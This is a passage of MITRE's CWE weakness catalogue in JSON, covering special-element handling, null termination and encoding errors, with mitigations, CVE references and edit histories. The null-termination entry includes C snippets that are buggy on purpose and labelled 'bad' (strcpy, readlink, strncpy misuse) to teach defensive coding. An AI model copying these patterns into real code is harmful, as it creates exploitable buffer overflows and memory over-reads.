Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Missing Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Missing Special Element","attr":{"@_Date":"2009-05-27"}}]}},"167":{"attr":{"@_ID":"167","@_Name":"Improper Handling of Additional Special Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not handle or incorrectly handles when an additional unexpected special element is provided.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that extra special elements will be injected in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0116","Description":"Extra \\"&lt;\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0116"},{"Reference":"CVE-2001-1157","Description":"Extra \\"&lt;\\" in front of SCRIPT tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"},{"Reference":"CVE-2002-2086","Description":"\\"&lt;script\\" - probably a cleansing error","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2086"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Special Element"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Extra Special Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Additional Special Element","attr":{"@_Date":"2009-05-27"}}]}},"168":{"attr":{"@_ID":"168","@_Name":"Improper Handling of Inconsistent Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle input in which an inconsistency exists between two or more special characters or reserved words.","Extended_Description":"An example of this problem would be if paired characters appear in the wrong order, or if the special characters are not properly nested.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"159","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control","Non-Repudiation"],"Impact":["DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Hide Activities"]}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that inconsistent special elements will be injected/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Inconsistent Special Elements"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Inconsistent Special Elements","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Inconsistent Special Elements","attr":{"@_Date":"2010-12-13"}}]}},"170":{"attr":{"@_ID":"170","@_Name":"Improper Null Termination","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator.","Extended_Description":"Null termination errors frequently occur in two different ways. An off-by-one error could cause a null to be written out of bounds, leading to an overflow. Or, a program could use a strncpy() function call incorrectly, which prevents a null terminator from being added at all. Other scenarios are possible.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"126","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"147","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"464","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"463","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Memory","Execute Unauthorized Code or Commands"],"Note":"The case of an omitted null character is the most dangerous of the possible issues. This will almost certainly result in information disclosure, and possibly a buffer overflow condition, which may be exploited to execute arbitrary code."},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Read Memory","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"If a null character is omitted from a string, then most string-copying functions will read data until they locate a null character, even outside of the intended boundaries of the string. This could: cause a crash due to a segmentation fault cause sensitive adjacent memory to be copied and sent to an outsider trigger a buffer overflow when the copy is being written to a fixed-size buffer."},{"Scope":["Integrity","Availability"],"Impact":["Modify Memory","DoS: Crash, Exit, or Restart"],"Note":"Misplaced null characters may result in any number of security problems. The biggest issue is a subset of buffer overflow, and write-what-where conditions, where data corruption occurs from the writing of a null character over valid data, or even instructions. A randomly placed null character may put the system into an undefined state, and therefore make it prone to crashing. A misplaced null character may corrupt other data in memory."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Alter Execution Logic","Execute Unauthorized Code or Commands"],"Note":"Should the null character corrupt the process flow, or affect a flag controlling access, it may lead to logical errors which allow for the execution of arbitrary code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Use a language that is not susceptible to these issues. However, be careful of null byte interaction errors (CWE-626) with lower-level constructs that may be written in a language that is susceptible."},{"Phase":"Implementation","Description":"Ensure that all string functions used are understood fully as to how they append null characters. Also, be wary of off-by-one errors when appending nulls to the end of strings."},{"Phase":"Implementation","Description":"If performance constraints permit, special code can be added that validates null-termination of string buffers, this is a rather naive and error-prone solution."},{"Phase":"Implementation","Description":"Switch to bounded string manipulation functions. Inspect buffer lengths involved in the buffer overrun trace reported with the defect."},{"Phase":"Implementation","Description":"Add code that fills buffers with nulls (however, the length of buffers still needs to be inspected, to ensure that the non null-terminated string is not written at the physical end of the buffer)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code reads from cfgfile and copies the input into inputbuf using strcpy(). The code mistakenly assumes that inputbuf will always contain a NULL terminator.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define MAXLEN 1024...char *pathbuf[MAXLEN];...read(cfgfile,inputbuf,MAXLEN); //does not null terminatestrcpy(pathbuf,inputbuf); //requires null terminated input...","xhtml:br":["","","","","",""]}},"Body_Text":"The code above will behave correctly if the data read from cfgfile is null terminated on disk as expected. But if an attacker is able to modify this input so that it does not contain the expected NULL character, the call to strcpy() will continue copying from memory until it encounters an arbitrary NULL character. This will likely overflow the destination buffer and, if the attacker can control the contents of memory immediately following inputbuf, can leave the application susceptible to a buffer overflow attack."},{"Intro_Text":"In the following code, readlink() expands the name of a symbolic link stored in pathname and puts the absolute path into buf. The length of the resulting value is then calculated using strlen().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[MAXPATH];...readlink(pathname, buf, MAXPATH);int length = strlen(buf);...","xhtml:br":["","","",""]}},"Body_Text":"The code above will not always behave correctly as readlink() does not append a NULL byte to buf. Readlink() will stop copying characters once the maximum size of buf has been reached to avoid overflowing the buffer, this will leave the value buf not NULL terminated. In this situation, strlen() will continue traversing memory until it encounters an arbitrary NULL character further on down the stack, resulting in a length value that is much larger than the size of string. Readlink() does return the number of bytes copied, but when this return value is the same as stated buf size (in this case MAXPATH), it is impossible to know whether the pathname is precisely that many bytes long, or whether readlink() has truncated the name to avoid overrunning the buffer. In testing, vulnerabilities like this one might not be caught because the unused contents of buf and the memory immediately following it may be NULL, thereby causing strlen() to appear as if it is behaving correctly."},{"Intro_Text":"While the following example is not exploitable, it provides a good example of how nulls can be omitted or misplaced, even when \\"safe\\" functions are used:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;string.h&gt;int main() {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char longString[] = \\"String signifying nothing\\";char shortString[16];strncpy(shortString, longString, 16);printf(\\"The last character in shortString is: %c (%1$x)\\\\n\\", shortString[15]);return (0);","xhtml:br":["","","","","",""]}}}},"Body_Text":"The above code gives the following output: \\"The last character in shortString is: n (6e)\\". So, the shortString array does not end in a NULL character, even though the \\"safe\\" string function strncpy() was used. The reason is that strncpy() does not impliciitly add a NULL character at the end of the string when the source is equal in length or longer than the provided size."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0312","Description":"Attacker does not null-terminate argv[] when invoking another program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0312"},{"Reference":"CVE-2003-0777","Description":"Interrupted step causes resultant lack of null termination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0777"},{"Reference":"CVE-2004-1072","Description":"Fault causes resultant lack of null termination, leading to buffer expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1072"},{"Reference":"CVE-2001-1389","Description":"Multiple vulnerabilities related to improper null termination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1389"},{"Reference":"CVE-2003-0143","Description":"Product does not null terminate a message buffer after snprintf-like call, leading to overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0143"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper Null Termination"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"String Termination Error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Miscalculated null termination"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS30-C","Entry_Name":"Use the readlink() function properly","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR03-C","Entry_Name":"Do not inadvertently truncate a null-terminated byte string"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP11","Entry_Name":"Improper Null Termination"}]},"Notes":{"Note":[{"#text":"Factors: this is usually resultant from other weaknesses such as off-by-one errors, but it can be primary to boundary condition violations such as buffer overflows. In buffer overflows, it can act as an expander for assumed-immutable data.","attr":{"@_Type":"Relationship"}},{"#text":"Overlaps missing input terminator.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Conceptually, this does not just apply to the C language; any language or representation that involves a terminator could have this type of problem."},{"#text":"As currently described, this entry is more like a category than a weakness.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"172":{"attr":{"@_ID":"172","@_Name":"Encoding Error","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly encode or decode the data, resulting in unexpected values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Encoding Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":[{"#text":"Partially overlaps path traversal and equivalence weaknesses.","attr":{"@_Type":"Relationship"}},{"#text":"This is more like a category than a weakness.","attr":{"@_Type":"Maintenance"}},{"#text":"Many other types of encodings should be listed in this category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 